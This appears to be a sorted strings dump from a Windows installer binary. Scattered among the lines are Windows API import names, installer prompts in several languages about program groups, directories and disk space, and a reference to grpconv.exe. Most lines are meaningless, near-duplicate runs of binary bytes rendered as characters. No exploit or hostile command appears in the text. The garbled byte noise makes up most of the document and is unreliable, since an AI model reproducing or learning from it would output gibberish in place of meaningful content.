?Fm(3_%3c0:j0<l/=n.<m3=m4<k18i3:l07h/9i9Ft:Dt4>n9Eu>I{LU
&+"FMF
~fmjjlfkojlpkmpnopnmnl
F/=mm~
[f|M[rXi
 FMV]el(07
fmvepxs
&-^fmY_d!'.)/6dirLR]&*5?CNmpxTZaFFLkb_
&-^fmY_f!'.)/6dirLR]&*5?CNmpxTZaFFLkb_
`fmYYe\\l_fubkuchqfeo`_iXZeSXaT]fXkrcs
fMz~[`
F) N3)K,#M3,H4/F91D84B64E41H90H5(K1%I3'G+ G+
FNv8=j.2b*0_&0` ._
FNv:=j-1a(/`&/a -a
Fnz?eq5\j.Xe+Xf/^l5dr4es9mz<q~4ju0gp1ho.el3ip2eo"U_(VaCnw^
Fnz?eq5\j.Xe-Xg/]n3dr2fs9mz<q~4iv0gp1ho.el4jq2fm"U_)WbCnw^
,""F=:OCC9)*-
+!!F=:OCC9)*-
=FO?HR:?HFHR5:C;CJ8?H;CJ=CH:@E?CH?FIDKNkssW\]489BACGEEFABE@AFA@NGDLGFKIICEEimn
Fox:en*X`&Y\!YZ
fppERPAONBOQ@LPBNT>HO;CJ7>G=@HADIHJRIQXL\c[k{p
fpr^kjYg]P``Sc]P^[LZZKYYJXcP__N\aTbYRaKKYEEQB>J:4?5'28-5:-592?./=35@35@75A87@=9?E=DB7A;3><:F>>N<>P@DOABLHBMNDPNDPIBO>;KFDWIIWKKYFFTOJYe[kcWiUI]WKaTRf\YrUVkUOfcVlfRecKc|e{
fpr]liWh]P`aTd\O][MY[LZYJXbQ__N\aTbWRaKKYDDRB>J:4?6(37,4:-5:4?//=23A04?75A88>=9?D<CB7A;3>=:I>>N<>P?CNABLHBMNEONDPIBO>;KFEUIHXMJYIFURKZf\mcWkUI]VK_WRg]YrWUkVPgcVlgSfcKc|e{
\F:pWG
fpwhswo{}htvry|w|}w|
FPZ4?C:FF>JJFRReooz
F&!Q32W==N66L0/C&!:
F& Q32W==N68K/.C% 9
&`?Fq/7\%-K
`F@qPGuXJ
fQ{XDsO=hG7dH7dNBrdXslcC?:
fQ{XDsO=hG7dH7dNBseYvmdC?:
FQY3?C9EE>JJFRReooz
Fqz=ip(QZ1Zc5_k6_h7^g:]g<]fDgkx
Fqz=ip(QZ1Zc7_k7`i7^g9]g:^fDflw
Fqz=ip'R[/Zc7_k6_h6]f:]g<]fDgku
Free disk space:
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Freier Platz der Diskette:
f_rOKlNMjOKkMLkLIiJGeGFfHGhKGlMJmOJlLGkKElLFiIChGDlIFtOKzNG
f^rOKlNMkONkMLkLIiJGfIEdHGhKGlMJmOJkMHlLGlLFiIChGDlIFtOKzNG
FromAdr
FRTDJOcip~
`FR>-W:+\8._8/bB5`6*Z6,Z>3R@5R@9J>8E<3HD9QL=XH7_G5^J9a^I^N7bJ2\J3]O3WP/XM/YA)Z<+\9/sLC
`FR>-W:+\8._8/bC4`6)\5,Y=2Q>6Q>9I?8C<3IE:QK>XH7^E5_J;a^I]M6bJ4\J3]O3WP/XM/YA)Z<+\9/sLC
FSi29H*,6259PVULURy
fS|\ItRBlK;bH8iVI~pdvmdKE>
fS|\ItRBlK;cI9iVI~pdvmdKE>
fS}uh+
fsw[heIVWAMM@NI>NA9JF?LMEPN@LJ:EF>EJ<GK;FJ9FF8CH;CG9DF6AB29F6=E79A12G24]EGU?AC/4A09F:@G<DE4AH<HHDPBFQHFRJCPFBML>JKAMPEOI>HI?KOHUQITQK\RGWXN^eYkjZkVJV^P\vcrsgyh\ni\lfZfbQZN68?"
fsyZigIVWAML?MH<N?9JD@LMEPN@LK;FG?FK=HK;FJ9FF8CH;CI9DF6AC2;F6=F58@01G24\DFU?AC/4A09E9?G<DC5AI=IHDPBFQHFRJCPFBML>JKAMODNI>HI?KOHUQITQK\RGWYN^dXjjZkVJV^P\vcrsgyh\ni\lg[gbQZN68>!
FT~DQ}DR|CRyBQxBS~CV
FT~DQ}DR|CRyBQxBT}CW
fTMp]U{h`
ftsYp^MxZI
]ftYanKT]@LRJP[ISZDLS?MYSn|x
]ftZboKT^@KSJP[ISZCKR>LXSn|x
~Fun Loving Criminal~
F,~<#v6
F[vCToFWr>Lh
fv|[hpXflgsw
fViSHgMFdNBnXL
FVP=L@6J=5J;2\OGnaYwg`
,.FVU;IH/99#&+"%*##)""(  &$',SUV
`FW:+\8._8/bB5`6*Z6,Z>3R@5R@9J>8J>8E<3HD9QL=XH7_G5^J9a^I^N7bJ2\J3]O3WP/XM/YA)Z<+\9/sLC
F[wG\{_s
F.wI1{I3yJ4~L5
FW~JXtIXrIYpkv
FW~JXtIYpIYplw
FWqCToXj
~fxeMejTpq[w]Jc\IdpZvnXpXETeQ^pXjnUinWe
~fxeMekUqq\u]Jc\IbpZvnXpXETdP]pXjlVhnWe
FX#Qc Sg'\p'\p Vg Wf!Xg(\l)\l!TdT
FX#Qc Sg'\p'\p Vg Wf!Xg(\l)\l"TfU
F=xQItPFoSHoTJoRKmQJoSLtQMyTL}RI
fX}`Qx^Ry^T
fX}`Qx^Ry^Tu\R
fX|`Uz`T
fXw[PmWEfO?iVG
Fy|fI;xO@
fYtYObJ>Jmc
f`zb\rYUhLKfKGiLHmSLpUKy[Vz_[
f`zb\sZVhLKfKGiLHmSLmSLpUKy[Vz_[
f`zb\sZVhLKfKGiLHmSLpUKy[Vz_[
fZ|NCa3+^-+\,*].0^06_5@m@Pp?Sm>Th>OkARqEVvIYxMXuIO~LL
fZ|NCb4,^-+\,*_.0^06`6Am@Pp?Sm>Th>OkARqEVvIYxMXvHN}KK
F=zPItPFpSJnSIoRKkQJoSLqQL
fZw]QhPDfL@jPDz`T
fZxUG|]Nxg^z
!'"!G;
$()%G@
G/#>.(:/+<0.F89H81M40K-2P/>I,CC*FA/NE6VI<bICfLIiJMlIOlJNkOOmLMiRIdULg_[tda{SPjIDYKBVM;LL8KM=OUE\O6RPC[RE_KB\JBYQFZ]Nch]ms^mrWghRd^>O[6F\7G_FJaKMcJNhNTpX`oN\sP^kV^fU`eWbq[gz`f
!)G%0L8?f+3[
G0(S;5oQF
,g&1m'2l(4j%3h ._ ._*8h<GsGP{Q\
G2yH2}H3~I4|J4
-G%3J]j
-G#3J_m
G!4Z3Np>Z}B^
:.$G5*jTI
<\g5Ra3MY9OZ6JU+:C
<\g5Ra3MY9PX8KS*9B
!G'6djx
g:6qNJS:8$
G.^7(f>,|XH
G7+ypc
G7*zqd
?G|9B{9F~<G
,g'9v*<{+>
@;<GABZTUmefzut
gAyb?w`>s_=p\9iW8hV9gZ6dW6dX6dX7eY9eX;gZ8i[/dV%VH!RB
gAyb?w`>s_=p\9iW8hV9gZ6dW6dX7eY9eX;gZ8i[/dV%VH!RB
GayD_yn
gAza?w`?t`?p\9iW9iW9gZ6dW6dX7eY9eX;gZ8i[/dV%VH!RB
gazeazwr
GBaHJR>LF5H?1DG8M\9N]1:='.
gc|cas[UlOFdNCeOC
gc|cat\VlOFdNCdNB
gC}dAyb>v_8p[2fT(\K'[J$\I"YF'XJ$KC
G~cD{bBy`Aw`;p\=p\6hV3eS5eS4dR/`P,`O+_N)]L&YK UG
G~cD{bCza?w`;p\=o]7iW2eQ5eS4cS/`P+_N+^P)\N&YK UH
GC|NCY=6WA;F5,G70I93XA9^IAoVL
^g{`cqR[e_epW[fS[hQWdPYbFU^DJUALTCSZEU\:EMCLU;GM<JP6BH>DK4>E2>D4?G6AI2=E/;A/;?2?A0<>-9;/;=2;>3<?5>A3<?1:=18;3;;6>=6A?9BF=T\X
g\cRI)#
gCzaEybDxa<r[:o[5jV1eS1bR0aQ/`P/`P,]O)ZL#TF!RD
gczhgvjhi\Zl\VnaY
]G<^D8iL={ZF
gD{bEybDxa<r[:o[5jV1eS1bR0aQ/`P/`P,]O)ZL#TF!RD
gD{bFzcCyb<q]:o[5jV0dR0dS.bQ/`P0aQ,]O)ZL#TF"SE
`gd[fc
GDI32.dll
g]{d\nYWp`Zrb\jZT
`g{^dqRZg_epW[fS[hQWdPYbGV_DJUBMUCSZEU\:EMCMT;GM<JP6BH>DK3?E2>D4@F7CI2>D/;A.:>3?C1=?-9;.:<2;>3<?4=@2;>1:=18;3;;5=<6A?:CG=T\X
`gdYgc
Geben Sie bitte das Verzeichnis ein, welches Sie diese Software behalten m
Geben Sie bitte die Namenbenennung ein, um die Eigenschaft dieser Software zubeschreiben.
G~eBxaBxa?u^:o[7kY4fT3bR-^N*[K*[K+\L)ZJ(WG%TD$QA
gE|c=u^=s\>q]<mY6iU3fX4bU6dX6dX4dX1dV.aS#XJ
gE|c@v_=s\=p\:mY6hV2fU2cU5cW4dX3cW1dV.aS#XJ
gE|c@v_=s\=p\:mY6hV2fU2cU5cW5cW4dX3cW1dV.aS#XJ
gE~eB|c;u];s^<q];nZ7jV8eU6bU3dV1dV0aS._Q+\N$VJ
gE~eC|c<v^;s\=r^;m[7iW8eU4bU3dV1cW0aS-^P+\N$WI
ge gesch
=Ge@KkHSsgp
Gesamt ben
GetACP
GetActiveWindow
GetClassInfoA
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetDesktopWindow
GetDeviceCaps
GET_DIR
GetDiskFreeSpaceA
GetDlgItem
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileAttributesA
GetFileSize
GetFileTime
GetFileType
GetFocus
GetFullPathNameA
GET_GROUP
GetLastActivePopup
GetLastError
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
GetOEMCP
GetPrivateProfileIntA
GetPrivateProfileStringA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSystemDefaultLangID
GetTempPathA
GetTextExtentPoint32A
GetVersion
GetVersionExA
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
GetWindowTextA
gF}dDzc?u^?t`8p[7kY3gU5dT/`P*^M-aP+\N)WJ%SF!P@
gF}dFzc@v_?u^:o[7lX5gU5dT/`P*^M,`O+\N)WJ&TG QA
GF`>@JEGH@E<2C(+<!1;$5=&/<"-< +@ 8G+:9%-
GF`>@KEGH@E<2C(+;#1;$5=&0=#*<
gflKHkNJjMIjMHjMHhNHjOKnPOiKJ}^]
GFnTQqXTqYWtYVvZYsYYqWXmQ[m<Li":h"6p.5`%"+$!
GFZDEYfg
GFZDEZef
gF{ZOnSXbKdUBfN<fH7jI9qL>vL?uI<mF8kMBlRFpXLrZNpUKuXQvYRtWNjPIeSHmYNn[SlZSnaYn`ZiaZf]Yk`\j^Zj^Zg^Zc]X_\T`]Ue^Uh_Vl^XgWQfXRl]Zo^[s_^scdvjhrgco_YiVOpZTkXQfSNfURl\Vr^YlVQmUOoYSmZSkYRmWQhQIjPInSInRKpVPv\Vs[UmWLsXNvZSqWPnUKnVJlRDqQDqQFpSEkQCpXL~cY
G:G4,F:.P<7TA9[H;kRBz[F
<Gg@KkHSsgo
ggT>9_E>qUJ
gguSWbDEO@;D97=5162+08-0:,->-*B/'C-"E/#I4%V;-a>0_9'a:$f:#zJ2|J3s@&{C*|D'
g[}g\ya[u_YhRLaMBdPErXLx^R{`V
g]}g\yg\
gh{brmX|fT
G$$H$$H
G$$H$$H "J!&S#(Y%)\&*]$(["(]"(]")[!(Y &U
g]~h]yg\
gido (
gI}eBxaBxa?u^:o[7kY4fT3bR-^N*[K+\L)ZJ(WG%TD$QA
~~~GII
GI PT,ZaMw~u
GI PT,ZaMw~w
)GITrWb
[giXdhamobnnerpnyw}
[giXdhamodnnhsqnyw}
?G|?Iy?Gv=Cr:@m8?f=CfQYw\`|\c|^d{`d|`c
G*-J5=G6AB0=A/<I8CK:EC2=A-9H5>UCJVDKK9@B29I7>M8AI1;eEJ
gJ~fDzcAw`<r[;nZ9iW8hV:fY5aT6aV6dX5eY6gY5cV-[N
gJ~fE|cAw`<r[;nZ:jX8hV:fY6bU6aV6dX5eY8fY5cV-[N
^gj]fj`gjkqpjrqszw
gjn`_hbakbilekrilpminhfl^`h]`e`chdprhr|Z\g=CN0;C0:A-9?/;?/=<-9?-9=,9;+8:,9;-:<1=?1=?,9;+8:*79-:<+8:+8:.:<.:<2>@-9;.7:.7:.7:/8;.7:-69.7:-77.7:1:=1;;0;9.970;9-863983;;/<:8>=:ILMrz
gjn`_hbakbjjekpilplhmgek^`h]`e_bgdprhr|Z\g=CN0;C0:A-9?/;?/=<.:@-9=+8:+8:,9;.;=1=?2>@,9;+8:+8:.;=+8:+8:.:<.:<2>@-9;.7:.7:07:/8;.7:-69/8;.88.7:1:=1;;0;9.972:9-861983;;0=;8>=:ILLrw
gjnjmqtxy
gjnjnovxy
 $',GJO`bcbfapsq
G>{J@sF8uJ9|N={RC|\O~WNoH@h@;hEBlHHmKKmKKiMLqMMjGClECqEDvKHxRM
gjy^apZ]lXXhRRbOO_PPbCDY=?W_c|bi
;Gk0<`&3Y*6^$3Z&7^4Gm/Bh#7`%7`#5^(:c$8a
;Gk2;`'4Z*6^$3Z&7^5Gl0Ah#8^%6a$5`(:c&7b
GKd5C_7F`-;Q .D)4J,:P->S,=R4EX4CV4BU4AW1=U5B\9Ea<Gb>Gb;B]?FaCIfEJiPSrOTuLPsMVxQXy\a
GKd5C_7F`-;R!/E)4J,:P->S,=R4EZ4BX4AW4AW0<T5B\9F`<Gb>Gb;B]?FaCIfEKhPSrOTuMQtNTwSXy\a
GKg;Ec.:V$0H"-C!.D$4K&7L(5K0;Q0:R3?W1=U1;S=B[7@[5@[6B^7D^ALgCNjCNjFQo<KkAMoLUzQW|ab
+[g)^k \h
+[g)^k \h ^i
gkl?ABIII
GKn;?bAGduz
gkpquz
?GlKOl
glmkmmjominmejkkpq
glmkmmkpninmejklqr
?GlMUzqy
gloquz
GlsX\IFWD?^LKiYZmaWueY
gluGJY==OC@PC=PC=PA>N;9E43=21:66<=EE5<?GMR
gm~cl~ly
."(;GMd_g~v}
gm~guyitwgr~mx
>GmKOl
gmlhlgmnlmnllpkmpnilj
gmlhlgnommnllpkmpnilj
|gmlimhlmilmklomnommnl
|gmlimhmnjknllomnommnl
G% M'"O*'N*'N)%N%%M
GM|PT}VXzWZvVZrW\uX]v\`xY^wY_vVawAOl&:i!6t+7g# 9!
GMr6<e+2],5a,9g
GMr6>f)2],5a,9g
gmv`b|il
gM<wO6
=GN!)0:=Ez|
gn}cmwp|
]gne@2wG5
Gn"E]?H
/G{:N}Ia
/G{:N}Jb
~gnkjlfkojlpkmpnopnmmm
gn}T]kW^qT^oUbrKZj3AS%4G
gn}T]kW^qT^oVcsKZj2@R%5F
gnwhqzepxclugpyhx
gnwhqzepxdmvgpyjw
<GO?HR:?HFHS6;D=BK8?H;CJ=CH<@E?CH?FIDKNkssV[\489A@BGEEFABE@AFA@NGDLGFKIICEEimn
'G!OoJv
Gopher
Got[:*n@.
gp}7DL8DHGSWfsus
gp}8CK8DHGSWfsus
GP|DMxGP{JS~MU}CS~ES
GP|DMxGP{JS~MU}ER~ES
gP_q[mV=Q9#5:
Gpy:en)X`&X^!YZ
gQ}[CrN6nG1g?,[:'jPBtcVpf\93,
gQ{\CrN6nG1g?,Z8(jPBtcVpf\93,
gQ}^ExT<oJ4f@.`>.mRDzgZlbX82+
gQ}^ExT<oJ4gB.`?,lRDxgZlbX82+
]gqN\hx
@Gr8As8Cw5@r.:j+5e+2c&+\
g`raTqxW^
g;$rB*
group_count
Groupe du programme
group_name
group_path
\grpconv.exe
grpkrojpkknlnsqpsqpsqpsqorpqrpqrporpnommpnopnnomnommmmhjkadhS[bYdl
grplspipkinlnsqnsqqtrpsqorporporporpnommpnnnnmmmnnnnnnhjkadhT\cYdl
GRr=IkANnALj@Ki/@[3>Y*0G
Grupa programu
Grupo de programa
Grupo do Programa
Gruppe erstellen :
Gruppo del programma 
GRV@KSCOSGRVDOSDMQDJOCINADL8;C
G*Rv^Uu\XrZXpXWnXOjVPp]Ko^Gi^DdYCaVIbTIZLHVJFUGHZIF^TB^Q>_P?YK<K=31&G93|fh
G*Rv^Uu\XrZZpXXoYPkWPp]Jp^Ii^DdYCaTJdTH[JHWIGVHHZIE]SB_P@_P?YK>K=31&I93|fh
-gs,an(_n*ap3fv,_o6iy5hx8fw1`n/[l5bo=nx;jx4an*Zf'Xf*eu$bm&dl.ir8v
-gs-bo&_n+bq3fv._o6iy7hx8fw/br)]m2fr>oy;my/co'^g&Zg'ep"^j$_i.cp<m{/gr4kz)gr"Vf,fr*_s [k
gs}`nt
[gsQZgV`jIUaNZfXblKT]@FM?CHpux
GSwJWqUczTawas
GSYBKTGNWFNUFNUBJQAFOACM@?I.-7
g`sYR|f`cOJq^[
g`sYR|g_bOHq^[
gszbl\DLbHNL15H,,S62P3/P12R58[??`ABJ*+;
gszck\DLaGML15H,,T73O2.P12T58[>A`ABJ+*;
G'|> t2
G`^TaON_ML[OEfTIxaR
gtgLVcGMU8;S43W87]>=Q23U8;S69bFFV76B 
_gt_hvajxemzux
]G<t[K
!G!'T$+V
{gtv_m
{gtv_n
G'}?!u3
\gudm{Z_n^fsM[gQ]iQ]gCSZCPXIV^FRXDPV=FOAJS?HQ5>G3<E4=F2>D1=A0<>2>@3?A3?A4=@3<?5>A8@@6>>8@@6BF>Za]
\gudm{Z_n_gtM[gQ]iQ]gCSZCPXIW]FRXEQW<GOAJS?IP5>G4>E4>E2>D1=A1=?2>@3?A3?A4=@3<?4=@8@@5==7??6BF>Za]
g^{^UfUH@|t
Guia de Usu
guopxw
G;U:,S7,X8+Y<-eL<nXFsXJ
G*Uu\XrZZpXXoYPkWPp]Jp^Ii^DdYCaTCaTJdTH[JHWIGVHHZIE]SB_P@_P?YK>K=31&I93|fh
GUyLXtIWsERlUbx[fzgu
gV~T={E.|G2}UC{XK
gV~T=|F-|G2}UC{XK
`gvV[tXX
`gvV[vWX
g[wi]ozju
gw}[krr
g[w]QhQBeK?jPDz`T
gw~`ryh}
gWsXCxYB
G (W#*U
g( x<0
=GX2@LBQZTdk_ovYjs^qyUjrd{
g`xc[ybZ
gXf]N\[LZbN[\BOZBN\HT^:F\9CZ9=^EA\FAXAEZEMS>FT<DQ<EP?HG;AC9?K<DQ:BT6;T9=T>CP:?P;>N@DTIQ\QYWQVUKQOHOWLNQCDUGIVHIQFBRDEJBLGFPOKWSPYYPSZJK]KLbQUdP\eMY[KVhTadO^_N\dXd\NYVKSn_cr]_P;9B"
`gxOVzX^z[d|_h
GX#Qc Sg'\p'\p Vg
G=xSKgOIlOKjQMnTNx[V
`GxT<rM7eA/`B1cH:ZI<^UL85-
`GxT<rM7gA/bA1cI;ZI<^UK;5.
gXtSCpRA
g( y;1
g`yd\ybZ
G`YJTJCZKIYMIbXNjaTwf]
gYkp_t
gY}_NxaYiaTUld^NB]KD]JB]H@`M>fMCrXL|_Q
gYp[Lm_Mg
gY|UFz]Nwg`j
g=zaAybBy_A~cAx_=|cCw`@{aC
G[zASrSe
G[zASrTc
}g|zfy~hx~hu}jfk
G<zPItOGpSJoSLoRKkQJmSLqQL
GZu=OfARl^q
GZu;PfARl^q
gZyVIzQH
gZzWJyPG
_h|'.=
]:&h?&
!*%! H."
<'+H14P7;TMQjXYs^]wXUn::R./D+,@10D76J=;QB?XEF[>@X>@X<>VCF[CE]ABWUUe|}
h1l1.T
H2}D/|D3
.H$2I\i
=H\3AS(6L$4K 2I
H3}D/|D3
=H\4BT(6L$4K!4I
=H|6Az8E}<G
/H!6Q,@_ARsSc
H7RE=YNFhXQ
&+"&H7"rS
H8t@/s@0
&*$'H9"u\
]h~'.A*1@19F88F84?@8BG;AD9;H=9M71O9.W=/]?.`?+fB*i?"o?
HA\>3Q;0_B9kN@
ha}dZ~cY
ha}dZ|cY
hapKEVNIX7-3+
h`aUPQSGGG;9;2.>*%=-'>
h`aVPQQGGH<:=5.=-'@3+7.$,4*.@36M>4_J4w\0
havYTi_]q_^r@CREGYdh{NShabw
hAyb?w`>s_=p\9iW8hV9gZ6dW6dX7eY9eX;gZ8i[/dV%VH!RB
|hb[:<6<GEISSDECL3/W0'J%
|hb[8<7=HFHRRDECM40X1(J%
=]hBbm:\i9[hEluKrzCluEq~Ly
hB|cB|d?wb:n\5iX1dV(]O%ZL(YK)VF#UC
hB|cB|d?wb:n\5iX1dV)^P%ZL(YK)VF#UC
,H(Bf;WvJ`
HB~G>{J@sF8uJ9|N={RC|\O|WOoH@iA<hEBlHHmKKmKKgNJrNNjGClECoFDvKHwQL
]H@bH<lL?|YK
]H@bI?uXO
Hbn2MW,FM)CJ
hbuSVkBMa7EX5DW:I\9G]6G\1?U,9O/=P(7J"3H)0ARVnnt
hbu_YmYTv[W
hbu_YnYWt[W
hbuYUh_]p``rBBREGYdh{MSf`dw
hbzd_~khvc`
&'HC4C*
hc[>9X?;]E?V<5^B;`C>`EAeFGlOK
,H(Ce=VvJ`
}h`cI=nRG
:!%HCInV_
hC^uVm
H]|CXw=Rq=Rq=Qp6Id.?T -C
hcY?9X@:\D>V<5]A:`C>`EAeFGlOK
h^~cY~aX
H%!D%$J00S;=X?CWBEYDGN9<T>@S>=T<<V>>N66I13K48S=Bzae
H%!D&%K11T<>X?CVADXCFM8;T>@S>=S;;U><O86H02J37S=Bxaf
hdmSLcKEbHBtZS
hdnTMcKEbHAr[S
&h^dpho0'1+ "
&h^dqip0'1+ "
hdua\kWRcQJeQLu_Y
H?{D=v<6q:3o81l4/i2+m6/s<5u>5s<3v?6
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
he~aVpQEaH;SD3HA6JB6J?8MFAVSObUJZVHZXLb]Ph]QeaWh]Wh[XhcYifYap_c{_e
Help...
H?|E>v<6p92o81l5.i2+m6/s<5u>5t=4v?6
HFtEEs>>n;;k74f2.b1._42`3.[1+Z/*].)`3-b63d11a0-Z.+X0.\4._41_22`33a63e86j:9k<<r?AwFH~GH
<h%Fx(I
hfyaasUVjOPe:;PAC[`bzss
hfybbtTUiOPe;<QCC[ba{tq
}hfydbxb]\FA^EAeKEeGBbE@[C=T@;TA<YFA^HC_E?ZECo]\
}hfydbxb]\FA^F@fLFeGBbE@[C=T@;UB=YFC^HC_E?\ECo]\
hG~eBxaBxa=u`8p[7kY5gU2`S-^N+\N+\N(YI(WG'TD%RB
hG~eBxaBxa?u^:o[7kY4fT3bR-^N*[K+\L)ZJ(WG%TD$QA
hgic_e
hgjKHkNJhNHhNHhNHhNHjOKkONiKJ}^]
<>?HGK\[_nmqz{
hg{SYlBL^6BT;I\?M`>Ka7DZ0=S5CV4CV.=P&-A7>Rho
hg{TYnBK_4BU9H[>M`>Ka7DZ0=S6DW4CV.=P&-A8?Sho
:::hhh
hhhXXXWWW```
HH~IJ|bb
HHXGATD>OD<MF?L@;D78<49:<DC>LJ4A?KTX
HHZ+8*.>
hhzddv\\nSQe\[k
hhzZbyTa{R^zO]yN]wQ_vS`vQ_ram
Hilfe...
HIMIHJ
hi}UWiOQcKK]FDWGCVD@SGEXKHXUP_
HixGh|5[m3al?r|?u
HiyGh|5[m3al?r|@v
hj|df~hj
HJm:>aBEduz
?HjMUzqy
#?!,H*/J(-O1*N0)R3(R3&P1'Q2(Q2(Q2+N3,P2,P2+O1*N0)M/)M/(L.(M-%J*$H*&H*&E(&D''C%'A#(>%$:!%6
<)&]HJqY[X<;D&!E$
hjthns
hjthnu
hjzdf~hj
?HKDMPQZ^fosrz
_hk]fi`hhkqpjrqsyx
?HKFMPR[_fnurz
$%!HKI
"> ,H*-K(,N0*N0*P2'Q2&P1'Q2(Q2(Q2)O1)O1+O1+O1+O1*N0(L.&L.(M-%I+&H*&H*&E(&D'&B%'A#(>%&;"%6
hkz^ap[^mXXhRRbOO_PPbCDY=?W`d}di
$)H'/L7>e+3[
hlm=@Eqs{qr|$&.
hlm;?@FFF
hlqfkngnqajmjkoy|
HL|QU~VXzWZvVZrW[sW\u[axZ_xW_vVawAOl&:i#5t+7g$!:!
Hm{Ai{Ak~Hs
Hm{Bj|Ak~Hs
hm|cgwdg~gk
hm}dhzeh
HM~GK~BFwFIvhh
~hmklpkmsnmsnnrmnqonqolomnqoopnrnmrpoqmlqmlomllmkfjkfknX_bajn
hmklpkosnosnnrmnqompnlompppooornmrpornmqmlomllmkglkfklX_bajn
 "#HML
hmnQWV]ba
hmnQWV\ba
hmpfkngnqajmjkoy}~
HN{EM|CM}DO
hnmEKJPUS
hnmFKJPUS
hnmiljmnlmnjmqllpkhki
hnmiljnomnomnrmmpnilj
hnmKQPW[\
hns98<<6;:57>58@7:;EW:EY:E[;H^8EU9CU9EW9IZ;JZ:BS6=L8AN?Q\Leo]s
hN=xO6
>HO!)0;>Fz}
Ho}CjsHkxHm{>ht:fs<iw8jv7kw8lx7ly?u
ho~cmwp|
ho{dhw_kwkw{t
>ho%KP
horOVYcinotwx|}z
horOVYcjmotwx|}z
.HO]ts
hozcgu_kwkw{t
hO{ZFll\]
<Hp5Ak-:h-<m4Bv>L
<Hp6Bl-:h.>m4Bv>L
=HPBKT;CJMR[CIPDLSCKRGOVDMPLTTPXXT[^W^a
=HPBKT;CJMR[CIPDLSCKRGPTDMPMUUPXXT[^W^a
[hp@OQ,:8+33--3('+
hpu_dT=AcIOdJPX>DaJO^GLP:?Q=B>-10
hpv_dU>BcJNdKOY?EaJO^GLP:?Q=B?.20
hP{ZFhgYB
hQ}[CvP8pG1`;'[:*bI9ZG:\PF3-&
hQ}[CvP8qF1a;)[:*aG9ZG:\PF2,%
HQ|HQ|FR|EQ{AQ{@N
HQ|HQ|FR|GP{AQ{@N
^HqI0h9
H@QjzV
hqtDNUBMUDNXCLYDKZGK]FGaQSqVe
hquLX^>JPAKRHOXGLUFKTDFPCCQ=:I@;J50?
\hr!,4,9A ,6&2>ZguYSr[Vs^Vtc[y\XuZWqZVoZXn`av]`u[atZarZ^vT^vVa|We|dp
\hr!,4-:B ,6&2>ZguYSr[Vs_Wuc[y\XuZWqYVoZXn`av]`u[atZarY_vT]xUb|Ud~dp
^hr.7@<GU"/=!/A'5K__
hren (beim Starten die Kontrolltafel ausf
hrgLUcGMU8;S43W87]>=R34U8;S69bFFV74B 
^hrK[hw
H'r:$l7
\hrOXaKV^fs{htzLX^BSVOgee
\hrOXbLW_hs{gsyJV\BQTSbdj{x
\hrOXbLW_hs{gsyJV\CRUTcej{x
hR	_O	\Y
H(Rv^Uu]XrZZpXXoYPkWPp]Jp^Ii^DdYCaTJdTH[JHWIGVHHZIE]SB_P@_P?YK>K=31&I93|fh
H %R#)X'-\)._03f25h7;l;?p?AqDGsLNwZZ
H %R#)X'-\)._03f25h7:m;?p>@pCFrLNwZZ
hr|XanKRaJTeJTeXaomr{
hr|XanKRaLTeJTeY`omr{
HRzMVwPUtOUrS\wP\tO_vQ_vVbz^l
HRzMVwPUtOUrS\wP\tO_vQ_vVbz\l
?Hs2Ar0<r2@u4Bw.:p/:l5?n@IuNW
HS[3>LCN\LYgP`mSfsH^jIamPjxQkwI_qUh}Sgybv
HS[3>LCN\LYgP_oSfsH^jIamQjzPjvI`pUh}Sgxcx
H.s: g/
h[SlYQzaW
hssW]sQXoIOqNRvQUxRXyW^xV`sV_lVblXds_kxbn
HSyHSoJWqK\qbr
HSyHSoJXoK\qbr
HT|5Ct0@u2Ay6D
HT|5Ct2@u2Ay4D
h_|]TiXKT
hT~]MtRBiJ;aH8]I>WH?d[RA;4
hT~]MuSCiJ;aH8\H=WH?d[R?<4
h^tSDxO@
 H!'T$+V
hTYWOPUPRSMNSNOVTTYVXYRWujr
hTYWOPVQSSMNSNOVTTYVXXQVujr
?HU(0=4:E:<F>@J:CL/6?BKUU^h;AN3;H6>K>DO:@K18A.4;(/8/8AXblt
?HU(1;4;D:<F?@J:CL/5@BKUU^h;AN5;H6>K>DO;AL18A03;)09/8AXblt
H+}=$u8
hUfOGeH?cJ@eH?
H.u: g/
`hu_hvajxemzux
H+u<"k3
|huQAk?.kD5mH:kI<pPEoOIkQAkQAoUDoUDqVBxTByK9|L:zSDwUE{I=yRDsXJnXLl\Om^NjaSl\Oq`Sr\PtXMsK?|I?
h^u]Qr[LtZL
Hur3'$
~}hURbOLgTQhWTcPK^KF^LEdQJcQJ`LG\GE[LIbYVTHHoeemcc8-/:14ngja[`)#(<5:tmtXPW7,4XNT
~}hURbOLgTQjWTcPK^KF^LEdQJcQJ_LGZGDXKIbYVTHHpffmcc8-/:14ngja[`)#(;5:tmtXPW7,4XNT
husW]rPWnHNqNRvQUxRXyW^xV`sV_kWclXds_kyco
huuZdR23W3-[62\61_5.g=8cABbGPr\n<)>'
HUXBJ=/PA8QC7UD;XE>bJDraT
H[v1M^*GU,DP*?G,?G*<C(:A(:A(:A):=)8:)8;(7:+7;-9;+79)57+79.::+79'35'35+47+47.7:,8:)57)33)33)25(46)57)25+55+55*36'35)57)55)33+55-86/76)11#/1)26+47(53.971>@8SWX~
H[v2N_*GU,DP*?G+>F*;D*9B(:A(:A(9<)8;+7;*6:*6:-9;+79*68*68.::+79'35'35+47+47.7:,8:)57)25(14)25(46)57)25+47+47(46'35)57(44'33+55.97/76)11#/1)25+47(53.881>@8SWX~
hVeB5E(#=(&9)*5')1"&8&'5%&3#$2$%3#$2"#0 !0!
H+v=#k3
|hvQCuQAk?.kD5mH:kI<pPEoOIkQAkQAoUDqVBxTByK9|L:zSDwUE{I=yRDsXJnXLl\Om^NjaSl\Oq`Sr\PtXMsK?|I?
|hvQCuQAk?.lE6mH:lJ=pPEnNHmPAkQAoUDqVAxTByK9}M;{TEvTD~J>{QDuXJpXLm]Pm^NjbQk[Nq`Sr\PtXMtL@
hvv\ltZjmVd]HQ`IQT=BJ24?%%F-+D+)F..H02G/1K11E($9
h_|_Vx^R}aV
h_|_Vy_S~bW
Hw{\<1rA3
